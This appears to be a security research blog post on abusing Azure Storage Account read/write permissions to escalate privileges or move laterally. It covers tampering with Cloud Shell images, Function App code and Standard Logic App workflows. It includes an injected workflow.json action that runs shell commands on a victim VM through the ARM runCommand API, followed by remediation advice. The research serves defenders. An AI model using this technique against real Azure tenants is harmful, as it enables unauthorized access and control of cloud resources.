top of page
White Hat

Not the Access You Asked For: How Azure Storage Account Read/Write Permissions Can Be Abused for Privilege Escalation and Lateral Movement

Updated: Jun 25

TL;DR In this blog we will dive into some unexpected techniques that allow an Azure user with Storage Account permissions to abuse them for privilege escalation and lateral movement. We will discuss prior work on storage to Azure Cloud Shell & Azure Function App and share a new technique around Azure Standard Logic App.


by: Tamir Yehuda (Tamirye94), Hai Vaknin (vakninhai)


 

Azure Storage Accounts 101

Azure Storage Accounts are Microsoft’s take on a cloud storage service that aims to provide a pay-as-you-go storage for various use-cases:


Blob Storage is designed for storing large amounts of unstructured data, such as text, images or binary data.

File Shares is a managed file share service for cloud or on-premise deployments. It operates through the standard SMB (Server Message Block) protocol and can be mounted concurrently by cloud or on-premise.

Queues is used to store and manage large volumes of messages. This service is useful for messaging within and between services.

Tables is a storage for structured NoSQL data.


In this blog we are going to focus on the first two storage types — Blob Storage & File Shares.


Access to a Storage Account can be done using the following methods:


Shared Access Signatures (SAS) — SAS tokens provide secure delegated access to resources in a Storage Account without exposing the account access keys. A SAS token is a string that contains an encrypted signature, granting permissions to a specific resource for a given time period.

Access Keys — Each Azure Storage Account has two keys (key1 and key2), which are used for authentication and access. These keys provide full access to the Storage Account, which is why handling and rotation of these keys must be done with care.

Role-Based Access Control (RBAC) — RBAC allows granting users, groups, or applications access to various resources in a Storage Account using Azure Entra ID (Azure Active Directory) roles. This method is preferred by enterprises seeking to implement the principle of least privilege.


You can read more about Azure Storage Accounts here.


 

The Mind-Blowing Moment

While reading the highly recommended book “Penetration Testing Azure for Ethical Hackers” by Karl Fosaaen and David Okeyode, we were introduced to a cool technique. Using Azure Storage Account access, attackers can privilege escalate via Azure Cloud Shell. This technique blew our minds and got us thinking, which other common Azure services rely on Azure Storage and can be abused in the same way?


Azure Cloud Shell Storage Account Privilege Escalation Breakdown


Azure Cloud Shell is an interactive, authenticated, browser-accessible shell for managing Azure resources. It provides an in-browser terminal interface using either Bash or PowerShell.


Running the Get-AzStorageAccount command from a PowerShell terminal on Azure Cloud Shell


Running the az logicapp list command from a Bash terminal on Azure Cloud Shell


Behind the scenes, each time a user asks for a new instance of Cloud Shell, a Linux container is being spawned. For Cloud Shell to have persistent storage, users are prompted to create a new Storage Account when first opening a Cloud Shell. The Storage Account can be created either automatically by Azure or manually by the user. When created automatically, the Storage Account’s name starts with “cs” prefix. Regardless of the creation method, all Cloud Shell File Shares are named in the following format: cs-<user-name>-<random-stirng>.


Cloud Shell File Share


Inside the File Share, an EXT2 filesystem image is created to store the user’s Cloud Shell files and configuration. The filesystem is attached to the Cloud Shell container that is spawned any time the user initiates a new Cloud Shell session.


If an attacker is able to gain access to a user that has Read & Write permissions (MICROSOFT.STORAGE/STORAGEACCOUNTS/FILESERVICES/SHARES/WRITE MICROSOFT.STORAGE/STORAGEACCOUNTS/FILESERVICES/SHARES/READ) to a File Share which contains a higher privileged user Cloud Shell EXT2 filesystem image, then the attacker will be able to:


– Download the filesystem image;

– mount it on a Linux\MacOS machine or WSL;

– edit the .bashrc and .Microsoft.PowerShell_profile.ps1 shell profile configuration files and – – append malicious code to them;

– and re-upload the modified image, overwriting the existing one.


Next time the victim will start a Cloud Shell session, the modified Bash or PowerShell profiles will be loaded and the malicious code the contain will get executed in the context of the privileged user.


Cloud Shell Attack Overview


 

Setting Our Scope

We decided to go over all Azure services, noting which ones are using Storage Accounts by default and can be good candidates to abuse. After some experimentation, we marked the following two services:


– Azure Function App

– Azure Standard Logic App


 

Azure Function App — Going to a Place Where Some Have Been Before

When we started looking into Azure Function App we found two highly useful blog posts by Orca Security’s Roi Nisimi [blog] and Rogier Dijkman[blog]. In those posts, Nissimi and Dijkman discuss similar techniques to abuse access to a Function App’s Storage Account, in order to takeover the Function App functions for privilege escalation or lateral movement.


Azure Function App Storage Account Privilege Escalation & Lateral Movement Breakdown


Azure Function App is a serverless computing platform that enables developers to build and deploy event-driven functions. To allow the functions to perform actions on Azure resources, it is a common practice to assign a managed identity with the required permissions to the Function App.


When an Azure Function App is deployed, the Function App configuration files, as well as the code of functions inside the Function App, are stored in a Storage Account using the File Share storage.


To prevent unauthorized users from triggering functions, each Function App is created with application keys. When a new function is created inside the Azure Function App, its authorization level is set to configure whether or not an application key is required to trigger the function, and whether to use a unique key for this specific function or the master key of the Azure Function App.



The application keys are stored in Blob Storage in the same Storage Account used for the Azure Function App code & configurations.


Attackers with Read & Write permissions (MICROSOFT.STORAGE/STORAGEACCOUNTS/FILESERVICES/SHARES/WRITE MICROSOFT.STORAGE/STORAGEACCOUNTS/FILESERVICES/SHARES/READ) to the Storage Account, in which the File Share with the functions code is stored but without permissions to the Function App itself, can edit the Function App configuration and the various functions code. By adding malicious code, attackers can steal the managed identity credentials or make the function perform actions on their behalf.


Function App Attack Overview


Attackers may have to wait for external triggering of the function when their current permissions do not allow them to trigger the function themselves. However, if the attackers gain access to a user with both Blob Storage Read & Write permissions (MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/WRITE MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/READ) and the File Share permissions, then they won’t be required to wait for external triggering. With these permissions, they can modify or steal the application keys and trigger the function themselves.


 

Azure Standard Logic App

Azure Logic App is a service that allows users to design and build automated workflows to integrate apps, data, services and systems. It offers a visual designer that simplifies the process of creating complex workflows through a drag-and-drop interface, enabling the automation of business processes without the need for extensive coding.


Looking into Azure Logic Apps we noticed they have two hosting models — Consumption & Standard.


In the Consumption model, the Logic App operates within a multi-tenant environment that is fully managed by Azure, and the user does not have access to the underlying Storage Account. In the Standard model, a Storage Account is created in conjunction with the Logic App, which then stores the workflows and secrets of the Logic App.


The more we dug into Azure Standard Logic App the more it became apparent that they are based off of Azure App Service and are an extension of the Azure Function App. This can be seen in host.json configuration of an Azure Logic App file:



This has installed confident in us, we could abuse the Logic Apps as well.


The way an Azure Logic App workflow is created is either by editing a json file or with the visual designer:


Visual designer view


Json code representation of the same workflow


In the above example is a very simple case of a logic app triggered by an http trigger (request sent to a specific URL) with a response saying “hello world” that is sent back to the triggering user.


This rudimentary example is only here to show how a Logic App workflow operate. Most workflows we encountered were much more complex and involved getting secrets from Azure Key Vaults, turning on or off Azure VMs, triggering Azure Functions, interacting with third party services or were triggered by Azure Sentinel Playbooks to auto-remediate security incidents.


In a similar way to Azure Function Apps, Logic App stores the “code” (workflow.json) in a File Share and secrets in the Blob Storage.


In many cases Azure Logic Apps are set with a managed identity to allow the Logic App workflows to manage or access Azure resources.


Azure Logic App Storage Account Lateral Movement Breakdown


Attackers with Read & Write permissions (MICROSOFT.STORAGE/STORAGEACCOUNTS/FILESERVICES/SHARES/WRITE MICROSOFT.STORAGE/STORAGEACCOUNTS/FILESERVICES/SHARES/READ) to the Storage Account in which the File Share with the Logic App workflows, can edit the “code” and subvert the workflow operation, running a malicious workflow in the context of the Logic App.


Standard App Attack Overview


Unlike Azure Function Apps or CloudShell where the exploitation might be more straightforward as the ability to run arbitrary code is easier, in the Logic App workflow case the attackers need to understand the Logic App workflows and the different actions that are part of them. In some cases, the attackers can exfiltrate secrets, take over third party connectors, trigger Azure Functions, run commands on Azure VMs, and in the most severe cases - create users or escalate privileges.


Azure Standard Logic App Storage Account Attack Scenario


Let’s imagine the following scenario, that was not at all based on something we saw in a client environment during an engagement…


Suppose we have the following Standard Logic App — nice-logic-app that manages a workload test. test is used for turning off VMs in the development environment inside dev-app1 resource group in dev-sub subscription.


To be able to perform this operation, nice-logic-app is assigned a managed identity with a Virtual Machine Contributor role on the whole subscription.



To simplify things, let’s assume one machine (shutdown-machine) that needs to be turned off, so test workflow is set in the following way:




Our attacker gains control over a user with permissions to Read & Write to Storage Account File Shares on the resource group where the nice-logic-app is set. Our attacker is not interested in shoutdown-machine but would really like access to victim-vm in app1 resource group in the same subscription.


The attacker accesses the File Share (shown here through Azure portal but can be done using Azure CLI\PowerShell\ARM API as well):



As the Logic App managed identity has permissions on this vm as well, our attacker adds the following section to the workflow.json:


 "HTTP": {
        "type": "Http",
        "inputs": {
          "headers": {
            "Content-Type": "application/json"
          },
          "body": {
            "commandId": "RunShellScript",
            "script": [
              "echo \"Gained $(whoami) access to this machine\" > /tmp/logic.txt"
            ]
          },
          "authentication": {
            "type": "ManagedServiceIdentity"
          },
          "uri": "https://management.azure.com/subscriptions/0xxxxe3-c81c-xxxx-bc0e-963xxxxxx478/resourceGroups/app1/providers/Microsoft.Compute/virtualMachines/victim-vm/runCommand?api-version=2024-03-01",
          "method": "POST"
        },
        "runAfter": {},
        "runtimeConfiguration": {
          "contentTransfer": {
            "transferMode": "Chunked"
          }
        }
      }

This action sends a POST request to the ARM API to run a command on the target VM in the Logic App managed identity context.


The malicious workflow will look like the following, after being edited:


{
  "definition": {
    "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#",
    "actions": {
      "Response": {
        "type": "Response",
        "kind": "Http",
        "inputs": {
          "statusCode": 200,
          "body": "Turned off all VMs in the development environment"
        },
        "runAfter": {
          "Power_off_virtual_machine": ["SUCCEEDED"]
        }
      },
      "Power_off_virtual_machine": {
        "type": "ApiConnection",
        "inputs": {
          "host": {
            "connection": {
              "referenceName": "azurevm"
            }
          },
          "method": "post",
          "path": "/subscriptions/@{encodeURIComponent('0xxxxe3-c81c-xxxx-bc0e-963xxxxxx478')}/resourcegroups/@{encodeURIComponent('dev-app1')}/providers/Microsoft.Compute/virtualMachines/@{encodeURIComponent('shutdown-machine')}/powerOff",
          "queries": {
            "api-version": "2019-12-01"
          }
        },
        "runAfter": {
          "HTTP": ["SUCCEEDED"]
        }
      },
      "HTTP": {
        "type": "Http",
        "inputs": {
          "headers": {
            "Content-Type": "application/json"
          },
          "body": {
            "commandId": "RunShellScript",
            "script": [
              "echo \"Gained $(whoami) access to this machine\" > /tmp/logic.txt"
            ]
          },
          "authentication": {
            "type": "ManagedServiceIdentity"
          },
          "uri": "https://management.azure.com/subscriptions/0xxxxe3-c81c-xxxx-bc0e-963xxxxxx478/resourceGroups/app1/providers/Microsoft.Compute/virtualMachines/victim-vm/runCommand?api-version=2024-03-01",
          "method": "POST"
        },
        "runAfter": {},
        "runtimeConfiguration": {
          "contentTransfer": {
            "transferMode": "Chunked"
          }
        }
      }
    },
    "contentVersion": "1.0.0.0",
    "outputs": {},
    "triggers": {
      "When_a_HTTP_request_is_received": {
        "type": "Request",
        "kind": "Http"
      }
    }
  },
  "kind": "Stateful"
}

After editing workflow.json, the attacker uploads it to the File Share and overwrites the existing workflow.


Although the attacker does not have access to the Logic App itself, the changes to the workflow.json are reflected in the Logic App designer as well:



So when the workload runs, the malicious commands will get executed on the victim-vm:



 

Detection & Remediation

The attacks described above show how important it is to stick to the least privileged principle. In many organizations over permissive access to Storage Accounts can lead to severe consequences.


As many organizations struggle with mapping their ever growing Azure Environment, we created a small script that would help cloud administrators locate all Storage Accounts susceptible to such attacks.


The script should be run by a user with at least Read privileges on all Storage Accounts in the Azure environment.


The script can be found here.


Script Output


After identifying all the sensitive Storage Accounts, we recommend to reviewing the access to each of them and revoking unneeded permissions. Also, by enabling File Share & Blob Storage logs and forwarding them to a SIEM, they can be monitored for suspicious access.


Enabling logs onStorage Accounts can be done manually by accessing Diagnostic settings in the left pane of the Storage Account, or preferably via a script or Azure Policy.


Storage Account with logs enabled


17 views0 comments

Comments


Commenting has been turned off.
bottom of page